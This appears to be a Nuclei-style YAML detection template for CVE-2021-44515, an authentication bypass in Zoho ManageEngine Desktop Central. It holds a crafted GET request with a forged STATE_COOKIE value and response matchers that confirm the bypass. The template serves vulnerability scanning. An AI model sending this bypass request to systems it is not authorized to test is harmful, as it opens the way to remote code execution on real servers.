36 lines
1.1 KiB
YAML
36 lines
1.1 KiB
YAML
|
id: CVE-2021-44515
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: Zoho ManageEngine Desktop Central - Remote Code Execution
|
||
|
|
author: Adam Crosser
|
||
|
|
severity: critical
|
||
|
|
description: Zoho Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.
|
||
|
|
reference:
|
||
|
|
- https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog
|
||
|
|
- https://srcincite.io/blog/2022/01/20/zohowned-a-critical-authentication-bypass-on-zoho-manageengine-desktop-central.html
|
||
|
|
- https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis
|
||
|
|
classification:
|
||
|
|
cve-id: CVE-2021-44515
|
||
|
|
tags: cve,cve2021,cisa,zoho,rce,manageengine
|
||
|
|
|
||
|
|
requests:
|
||
|
|
- raw:
|
||
|
|
- |
|
||
|
|
GET /STATE_ID/123/agentLogUploader HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
Cookie: STATE_COOKIE=&_REQS/_TIME/123
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
- type: status
|
||
|
|
status:
|
||
|
|
- 200
|
||
|
|
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- "len(body) == 0"
|
||
|
|
|
||
|
|
- type: word
|
||
|
|
part: header
|
||
|
|
words:
|
||
|
|
- "UEMJSESSIONID="
|